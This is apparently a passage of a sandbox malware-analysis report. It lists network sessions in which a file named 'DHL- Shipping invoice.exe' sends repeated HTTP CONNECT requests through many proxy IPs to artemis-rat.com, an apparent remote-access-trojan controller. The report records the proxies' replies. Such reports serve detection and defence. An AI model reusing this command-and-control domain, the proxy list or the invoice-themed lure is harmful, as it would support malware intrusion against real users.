                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.343852043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.250171900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:09.932719946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:17.140872002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            43192.168.2.449930162.159.242.150806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.733997107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.821671963 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            44192.168.2.449873213.136.78.200409276484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.735621929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.218707085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.781017065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.890377998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:03.250173092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.562962055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:07.953418970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            45192.168.2.449938104.23.119.91806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.743079901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.830990076 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            46192.168.2.449925158.69.53.9893006484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.746254921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:05.090648890 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            47192.168.2.449908181.78.11.2179996484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.752840042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.187239885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.656171083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.117749929 CET19INHTTP/1.1 200 OK


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            48192.168.2.44993538.162.19.5531286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.756433010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.093691111 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            49192.168.2.449843109.194.22.6180806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.765847921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.449896167.86.69.142444396484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.767163992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.449904130.162.213.17531296484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.769047976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.951150894 CET39INHTTP/1.1 200 Connection established


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.449949162.159.242.8806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.780378103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.867245913 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            53192.168.2.44995145.12.31.104806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.782133102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.869745016 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            54192.168.2.449971104.25.42.178806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.794009924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.882462025 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            55192.168.2.45007247.236.85.1134436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.798096895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            56192.168.2.45007447.236.85.1134436484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.800657988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            57192.168.2.449865138.201.21.218650326484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.801286936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.090851068 CET24INHTTP/1.1 403 #string


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            58192.168.2.449812116.107.201.1440066484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.802422047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:10.309325933 CET58INHTTP/1.1 200 Connection Established
                            Content-Length: 0


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            59192.168.2.44984031.148.207.153806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.807504892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.138365030 CET340INHTTP/1.1 400 Bad Request
                            Server: nginx/1.12.2
                            Date: Tue, 12 Mar 2024 07:36:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Content-Length: 173
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            60192.168.2.449985203.30.190.172806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.809662104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.896990061 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            61192.168.2.44997038.162.9.7231286484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.810058117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.110682011 CET111INHTTP/1.1 407 Proxy Authentication Required
                            Proxy-Authenticate: Basic realm=""
                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                            Data Ascii: Proxy Authentication Required


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            62192.168.2.449917199.116.114.1141456484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.816299915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            63192.168.2.4500051.0.0.187806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.831784010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:58.919333935 CET316INHTTP/1.1 400 Bad Request
                            Server: cloudflare
                            Date: Tue, 12 Mar 2024 07:36:58 GMT
                            Content-Type: text/html
                            Content-Length: 155
                            Connection: close
                            CF-RAY: -
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            64192.168.2.449982162.241.70.64628746484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.831809998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.156055927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.484132051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:00.124816895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:01.562694073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:02.859455109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:04.250097036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:06.953547955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:37:12.250137091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            65192.168.2.44985247.95.217.124806484C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            TimestampBytes transferredDirectionData
                            Mar 12, 2024 08:36:58.833642006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                            Host: artemis-rat.com
                            Proxy-Connection: Keep-Alive
                            Mar 12, 2024 08:36:59.139125109 CET767INHTTP/1.1 403 Forbidden
                            Server: Beaver
                            Cache-Control: no-cache
                            Content-Type: text/html
                            Content-Length: 635
                            Connection: close
